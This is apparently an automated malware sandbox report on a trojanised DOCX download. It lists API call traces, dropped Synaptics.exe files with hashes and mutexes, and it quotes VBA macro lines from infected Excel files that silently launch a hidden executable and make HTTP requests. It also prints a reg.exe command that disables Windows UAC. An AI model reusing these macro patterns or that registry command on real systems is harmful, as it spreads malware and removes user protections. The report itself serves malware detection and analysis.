Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_00457294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		60_2_00457294

Source: C:\Users\user\Desktop\._cache_DOCX.exe

46_2_006E7099

Source: C:\Users\user\Desktop\._cache_DOCX.exe

Code function: 46_2_006D4342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

46_2_006D4342

Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006FF5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		46_2_006FF5D0
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0046F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		60_2_0046F5D0

System Summary

Document contains an embedded VBA macro with suspicious strings

Source: aQCaWWkc.xlsm.50.dr	OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
Source: aQCaWWkc.xlsm.50.dr	OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: aQCaWWkc.xlsm.50.dr	OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: aQCaWWkc.xlsm.50.dr	OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: aQCaWWkc.xlsm.50.dr	OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
Source: aQCaWWkc.xlsm.50.dr	OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
Source: aQCaWWkc.xlsm.50.dr	OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
Source: aQCaWWkc.xlsm.50.dr	OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
Source: aQCaWWkc.xlsm.50.dr	OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
Source: aQCaWWkc.xlsm.50.dr	OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
Source: aQCaWWkc.xlsm.50.dr	OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
Source: BNAGMGSPLO.xlsm.50.dr	OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
Source: BNAGMGSPLO.xlsm.50.dr	OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: BNAGMGSPLO.xlsm.50.dr	OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: BNAGMGSPLO.xlsm.50.dr	OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: BNAGMGSPLO.xlsm.50.dr	OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
Source: BNAGMGSPLO.xlsm.50.dr	OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
Source: BNAGMGSPLO.xlsm.50.dr	OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
Source: BNAGMGSPLO.xlsm.50.dr	OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
Source: BNAGMGSPLO.xlsm.50.dr	OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
Source: BNAGMGSPLO.xlsm.50.dr	OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
Source: BNAGMGSPLO.xlsm.50.dr	OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")

Document contains an embedded VBA with functions possibly related to ADO stream file operations

Source: aQCaWWkc.xlsm.50.dr	Stream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
Source: BNAGMGSPLO.xlsm.50.dr	Stream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write

Document contains an embedded VBA with functions possibly related to HTTP operations

Source: aQCaWWkc.xlsm.50.dr	Stream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
Source: BNAGMGSPLO.xlsm.50.dr	Stream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send

Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)

Source: aQCaWWkc.xlsm.50.dr	Stream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
Source: BNAGMGSPLO.xlsm.50.dr	Stream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ

Downloads suspicious files via Chrome

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File dump: C:\Users\user\Downloads\DOCX.zip (copy)

Jump to dropped file

Drops password protected ZIP file

Source: DOCX.zip.crdownload.21.dr	Zip Entry: encrypted
Source: chromecache_1013.25.dr	Zip Entry: encrypted

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}

Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006929C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,	46_2_006929C2
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_007002AA NtdllDialogWndProc_W,	46_2_007002AA
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006FE769 NtdllDialogWndProc_W,CallWindowProcW,	46_2_006FE769
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006FEA4E NtdllDialogWndProc_W,	46_2_006FEA4E
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006FEAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,	46_2_006FEAA6
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006FECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,	46_2_006FECBC
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006AAC99 NtdllDialogWndProc_W,	46_2_006AAC99
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006AAD5C NtdllDialogWndProc_W,74D2C8D0,NtdllDialogWndProc_W,	46_2_006AAD5C
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006FEFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,	46_2_006FEFA8
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006AAFB4 GetParent,NtdllDialogWndProc_W,	46_2_006AAFB4
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006FF0A1 SendMessageW,NtdllDialogWndProc_W,	46_2_006FF0A1
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006FF122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,	46_2_006FF122
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006FF37C NtdllDialogWndProc_W,	46_2_006FF37C
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006FF3DA NtdllDialogWndProc_W,	46_2_006FF3DA
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006FF3AB NtdllDialogWndProc_W,	46_2_006FF3AB
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006FF45A ClientToScreen,NtdllDialogWndProc_W,	46_2_006FF45A
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006FF425 NtdllDialogWndProc_W,	46_2_006FF425
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006FF5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,	46_2_006FF5D0
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006FF594 GetWindowLongW,NtdllDialogWndProc_W,	46_2_006FF594
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006AB7F2 NtdllDialogWndProc_W,	46_2_006AB7F2
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006AB845 NtdllDialogWndProc_W,	46_2_006AB845
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006FFE80 NtdllDialogWndProc_W,	46_2_006FFE80
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006FFF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,	46_2_006FFF04
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006FFF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,	46_2_006FFF91
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_004029C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,	60_2_004029C2
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_004702AA NtdllDialogWndProc_W,	60_2_004702AA
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0046E769 NtdllDialogWndProc_W,CallWindowProcW,	60_2_0046E769
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0046EA4E NtdllDialogWndProc_W,	60_2_0046EA4E
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0046EAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,	60_2_0046EAA6
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0041AC99 NtdllDialogWndProc_W,	60_2_0041AC99
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0046ECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,	60_2_0046ECBC
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0041AD5C NtdllDialogWndProc_W,74D2C8D0,NtdllDialogWndProc_W,	60_2_0041AD5C
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0046EFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,	60_2_0046EFA8
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0041AFB4 GetParent,NtdllDialogWndProc_W,	60_2_0041AFB4
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0046F0A1 SendMessageW,NtdllDialogWndProc_W,	60_2_0046F0A1
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0046F122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,	60_2_0046F122
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0046F37C NtdllDialogWndProc_W,	60_2_0046F37C
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0046F3DA NtdllDialogWndProc_W,	60_2_0046F3DA
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0046F3AB NtdllDialogWndProc_W,	60_2_0046F3AB
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0046F45A ClientToScreen,NtdllDialogWndProc_W,	60_2_0046F45A
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0046F425 NtdllDialogWndProc_W,	60_2_0046F425
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0046F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,	60_2_0046F5D0
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0046F594 GetWindowLongW,NtdllDialogWndProc_W,	60_2_0046F594
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0041B7F2 NtdllDialogWndProc_W,	60_2_0041B7F2
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0041B845 NtdllDialogWndProc_W,	60_2_0041B845
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0046FE80 NtdllDialogWndProc_W,	60_2_0046FE80
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0046FF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,	60_2_0046FF04
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0046FF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,	60_2_0046FF91

Source: C:\Users\user\Desktop\._cache_DOCX.exe

Code function: 46_2_006D702F: CreateFileW,DeviceIoControl,CloseHandle,

46_2_006D702F

Source: C:\Users\user\Desktop\._cache_DOCX.exe

Code function: 46_2_006CBC90 GetCurrentProcess,OpenProcessToken,CloseHandle,CreateProcessWithLogonW,

46_2_006CBC90

Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006D82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		46_2_006D82D0
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_004482D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		60_2_004482D0

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006F30AD	46_2_006F30AD
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006A3680	46_2_006A3680
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_0069DCD0	46_2_0069DCD0
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_0069A0C0	46_2_0069A0C0
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006B0183	46_2_006B0183
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006D220C	46_2_006D220C
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_00698530	46_2_00698530
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_00696670	46_2_00696670
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006B0677	46_2_006B0677
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006C8779	46_2_006C8779
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006FA8DC	46_2_006FA8DC
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006B0A8F	46_2_006B0A8F
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_00698CA0	46_2_00698CA0
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006BAC83	46_2_006BAC83
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006AAD5C	46_2_006AAD5C
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006B0EC4	46_2_006B0EC4
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006C4EBF	46_2_006C4EBF
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006C113E	46_2_006C113E
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006B12F9	46_2_006B12F9
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006C542F	46_2_006C542F
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006FF5D0	46_2_006FF5D0
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006C599F	46_2_006C599F
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006BDA74	46_2_006BDA74
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_00695D32	46_2_00695D32
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_0069BDF0	46_2_0069BDF0
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006BBDF6	46_2_006BBDF6
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006B1E5A	46_2_006B1E5A
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006BDF69	46_2_006BDF69
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006C7FFD	46_2_006C7FFD
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006DBFB8	46_2_006DBFB8
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0040DCD0	60_2_0040DCD0
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0040A0C0	60_2_0040A0C0
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_00420183	60_2_00420183
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0044220C	60_2_0044220C
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_00408530	60_2_00408530
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_00406670	60_2_00406670
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_00420677	60_2_00420677
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_00438779	60_2_00438779
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0046A8DC	60_2_0046A8DC
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_00420A8F	60_2_00420A8F
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0042AC83	60_2_0042AC83
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_00408CA0	60_2_00408CA0
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0041AD5C	60_2_0041AD5C
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_00420EC4	60_2_00420EC4
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_00434EBF	60_2_00434EBF
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_004630AD	60_2_004630AD
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0043113E	60_2_0043113E
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_004212F9	60_2_004212F9
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0043542F	60_2_0043542F
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0046F5D0	60_2_0046F5D0
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_00413680	60_2_00413680
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0043599F	60_2_0043599F
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0042DA74	60_2_0042DA74
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_00405D32	60_2_00405D32
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0040BDF0	60_2_0040BDF0
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0042BDF6	60_2_0042BDF6
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_00421E5A	60_2_00421E5A
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0042DF69	60_2_0042DF69
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_00437FFD	60_2_00437FFD
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0044BFB8	60_2_0044BFB8

Source: aQCaWWkc.xlsm.50.dr	OLE, VBA macro line: Private Sub Workbook_Open()
Source: aQCaWWkc.xlsm.50.dr	OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
Source: BNAGMGSPLO.xlsm.50.dr	OLE, VBA macro line: Private Sub Workbook_Open()
Source: BNAGMGSPLO.xlsm.50.dr	OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)

Source: Joe Sandbox View	Dropped File: C:\ProgramData\Synaptics\RCX1FC6.tmp F85A3EAA91C625FDA14FE0C55BED7C3F43321475D871AA07AF90A2E532219B85
Source: Joe Sandbox View	Dropped File: C:\ProgramData\Synaptics\Synaptics.exe 55D2BEA108EEAABCDF59D449CF15F0EFABB59E243D9BD91FF0B0805CD3D133DF
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe 36DAC4B76A8C3EA977D141EE3DF142383EFA9B0BC24D19DA949D106D0B602207

Source: C:\Program Files\7-Zip\7z.exe

Process token adjusted: Security

Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: String function: 006B7750 appears 42 times
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: String function: 006AF885 appears 68 times
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: String function: 00427750 appears 42 times
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: String function: 0041F885 appears 68 times

Source: C:\ProgramData\Synaptics\Synaptics.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 656 -s 2628

Source: DOCX.exe.38.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Source: DOCX.exe.38.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: Synaptics.exe.42.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Source: Synaptics.exe.42.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: RCX1FC6.tmp.42.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: ~$cache1.50.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

Source: classification engine

Classification label: mal100.troj.expl.evad.winBAT@111/77@10/11

Source: C:\Users\user\Desktop\._cache_DOCX.exe

Code function: 46_2_006DD712 GetLastError,FormatMessageW,

46_2_006DD712

Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006CB8B0 AdjustTokenPrivileges,CloseHandle,	46_2_006CB8B0
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006CBEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	46_2_006CBEC3
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0043B8B0 AdjustTokenPrivileges,CloseHandle,	60_2_0043B8B0
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0043BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	60_2_0043BEC3

Source: C:\Users\user\Desktop\._cache_DOCX.exe

Code function: 46_2_006DEA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

46_2_006DEA85

Source: C:\Users\user\Desktop\._cache_DOCX.exe

Code function: 46_2_006D6F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,

46_2_006D6F5B

Source: C:\Users\user\Desktop\._cache_DOCX.exe

Code function: 46_2_006DEFCD CoInitialize,CoCreateInstance,CoUninitialize,

46_2_006DEFCD

Source: C:\Users\user\Desktop\._cache_DOCX.exe

Code function: 46_2_006931F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

46_2_006931F2

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\Downloads\1a6946d3-ebff-4ef2-9ef3-e64281789500.tmp

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\ProgramData\Synaptics\Synaptics.exe	Mutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess656
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8056:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8160:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6064:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8892:120:WilError_03

Source: C:\Windows\System32\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\Startup

Jump to behavior

